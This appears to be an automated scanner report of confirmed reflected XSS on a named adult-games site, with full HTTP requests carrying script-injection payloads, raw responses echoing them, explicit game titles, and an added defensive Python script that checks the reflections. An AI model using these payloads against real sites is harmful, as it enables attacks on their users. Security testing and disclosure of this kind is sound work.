width="157" height="112" ><span class = "def">Venona Project: Episode 1</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Poker with Nicole" title="Poker with Nicole"><img src="imago/pokernikole.jpg" class = "game" width="157" height="112" ><span class = "def">Poker with Nicole</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG" title="Seductive RPG"><img src="imago/sedrpg.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Jordan 500: HCC" title="Jordan 500: HCC"><img src="imago/j500.jpg" class = "game" width="157" height="112" ><span class = "def">Jordan 500: HCC</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Miami Holidays" title="Miami Holidays"><img src="imago/mhol.jpg" class = "game" width="157" height="112" ><span class = "def">Miami Holidays</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High school romance" title="High school romance"><img src="imago/highschoolromance.jpg" class = "game" width="157" height="112" ><span class = "def">High school romance</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Sweet neighbor" title="Sweet neighbor"><img src="imago/sweetneighbour.jpg" class = "game" width="157" height="112" ><span class = "def">Sweet neighbor</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny teacher" 
title="Horny teacher"><img src="imago/hornyteacher.jpg" class = "game" width="157" height="112" ><span class = "def">Horny teacher</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Star Mission" title="Meet`N`Fuck Star Mission"><img src="imago/star.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Star Mission</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Maid" title="Horny Maid"><img src="imago/hornymaid.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Maid</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Olympic Adventures" title="Olympic Adventures"><img src="imago/olympic.jpg" class = "game" width="157" height="112" ><span class = "def">Olympic Adventures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=SpiderMan Black Cat Felatio" title="SpiderMan Black Cat Felatio"><img src="imago/spiderman.jpg" class = "game" width="157" height="112" ><span class = "def">SpiderMan Black Cat Felatio</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=I love Laura" title="I love Laura"><img src="imago/illovelaura.jpg" class = "game" width="157" height="112" ><span class = "def">I love Laura</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High Tail Hall" title="High Tail Hall"><img src="imago/fur.jpg" class = "game" width="157" height="112" ><span class = "def">High Tail Hall</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> 
</a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >3</a> &nbsp; <a href="?offset=60&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >4</a> &nbsp; <a href="?offset=80&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >5</a> &nbsp; <a href="?offset=100&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >6</a> &nbsp; <a href="?offset=120&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >7</a> &nbsp; <a href="?offset=140&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >8</a> &nbsp; <a href="?offset=40&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. 
</div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter Type Value
type GET register
stage POST adduser
usernamex POST '"--></style></script><script>alert(0x000203)</script>
passwordx POST 3
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 177
Accept-Encoding: gzip, deflate

stage=adduser&usernamex='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000203)%3c%2fscript%3e&passwordx=3&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2358
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span 
class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">\'\"--></style></script><script>netsparker(0x000203)</script>, welcome to Lesson of Passion CLUB!</span><br /><br />Your account with following data have been created.<br /><br />USERNAME: <strong>\'\"--></style></script><script>netsparker(0x000203)</script></strong><br />PASSWORD: <strong>3</strong><br /><br 
/>Please LOGIN and start your adventure.<br /><br />We wish you best luck.<br />LOP TEAM<br /></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=Ronald Smith&quest=0", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=Ronald Smith&quest=0" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
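Added example, not part of the Netsparker report and not the site's own code: a small Python 3 script that reproduces the confirmation step behind the CONFIRMED findings above. It takes a response body, looks for the probe value in each form it might come back in, and reports the HTML context of every reflection. The point it makes explicit is visible in the responses above: the quote characters came back as \' \" (addslashes or magic_quotes style escaping), but < and > passed through untouched, so the injected <script> is live in the <title>, in the paging link's href attribute and in the registration page's body text. The sample fragments are constructed here and only modelled on those responses; the names PAYLOAD, addslashes, context_at, analyse, is_exploitable and SAMPLES are this example's own.

```python
import html
import re

# The probe the scanner sent in the games_new.php and user.php findings above.
# netsparker() is the scanner's marker function (the Parameters tables show the
# attacker's alert() form); the leading '"--></style></script> is there to close
# whatever quote, comment, <style> or <script> the value may have landed inside.
PAYLOAD = '\'"--></style></script><script>netsparker(0x0001A6)</script>'


def addslashes(s: str) -> str:
    """PHP addslashes()/magic_quotes_gpc behaviour: backslash before ' " \\ and NUL.
    This is what produced the \\'\\" seen in the responses; it is an SQL-flavoured
    escape that leaves < and > untouched, so it is no defence against XSS."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


# Forms the value may come back in. The third field says whether markup in the
# value is still live: only entity encoding of < and > neutralises it.
VARIANTS = [
    ("raw", PAYLOAD, True),
    ("addslashes", addslashes(PAYLOAD), True),
    ("html_escaped_quotes", html.escape(PAYLOAD, quote=True), False),    # like htmlspecialchars(..., ENT_QUOTES)
    ("html_escaped_noquotes", html.escape(PAYLOAD, quote=False), False),  # encodes only & < >
]

# Constructed fragments (assumption: modelled on the response bodies in this
# report, not copied from a live response): category in <title>, category in a
# paging link's href, the registration page's username in body text, and what
# a fixed page should emit for the same input.
SAMPLES = {
    "title_text": "<title>Lesson of Passion - " + addslashes(PAYLOAD) + " erotic flash games</title>",
    "href_attr": '<a href="?offset=0&id=3&category=' + addslashes(PAYLOAD) + '"><strong>PREVIOUS</strong></a>',
    "body_text": '<span class="big">' + addslashes(PAYLOAD) + ", welcome to Lesson of Passion CLUB!</span>",
    "fixed": "<title>Lesson of Passion - " + html.escape(PAYLOAD, quote=True) + " erotic flash games</title>",
}


def context_at(body: str, pos: int) -> str:
    """Heuristic HTML context of a value that starts at `pos`: 'attribute' if the
    last '<' before pos has not been closed by '>', else the innermost of
    script/style/title that is still open, else 'text'."""
    before = body[:pos]
    if before.rfind("<") > before.rfind(">"):
        return "attribute"
    for tag in ("script", "style", "title"):
        opens = len(re.findall(rf"<{tag}\b", before, re.I))
        closes = len(re.findall(rf"</{tag}\s*>", before, re.I))
        if opens > closes:
            return f"{tag}_text"
    return "text"


def analyse(body: str):
    """Every reflection of PAYLOAD in `body` as (encoding, context, markup_live)."""
    found = []
    for name, needle, markup_live in VARIANTS:
        start = 0
        while (i := body.find(needle, start)) >= 0:
            found.append((name, context_at(body, i), markup_live))
            start = i + len(needle)
    return found


def is_exploitable(body: str) -> bool:
    """True when at least one reflection keeps the injected markup live."""
    return any(live for _, _, live in analyse(body))


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:10s} exploitable={is_exploitable(body)!s:5s} {analyse(body)}")
```

Run it with `python3` and compare the first three samples with the last: the only one that comes back not exploitable is the one where the value was entity-encoded before being written into the page, which is the remedy the report's generic text points at. The context label matters for the fix as well: a value written into an attribute needs the quotes encoded too (ENT_QUOTES in PHP), not just < and >.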
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter Type Value
type GET register
stage POST adduser
usernamex POST Ronald Smith
passwordx POST '"--></style></script><script>alert(0x000209)</script>
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000209)%3c%2fscript%3e&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4658
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span 
class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dgirlfriends.com/?t=110138,1,53,0" target = "_blank"><img src="lopsalesforce/vert_3dgf.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br 
/><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x000209)</script>"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African 
Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option 
value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option 
value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option 
value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <..
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter    Type   Value
type         GET    register
stage        POST   adduser
usernamex    POST   Ronald Smith
passwordx    POST   3
password2x   POST   '"--></style></script><script>alert(0x00020A)</script>
emailx       POST   netsparker@example.com
country      POST   AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00020A)%3c%2fscript%3e&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4445
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span 
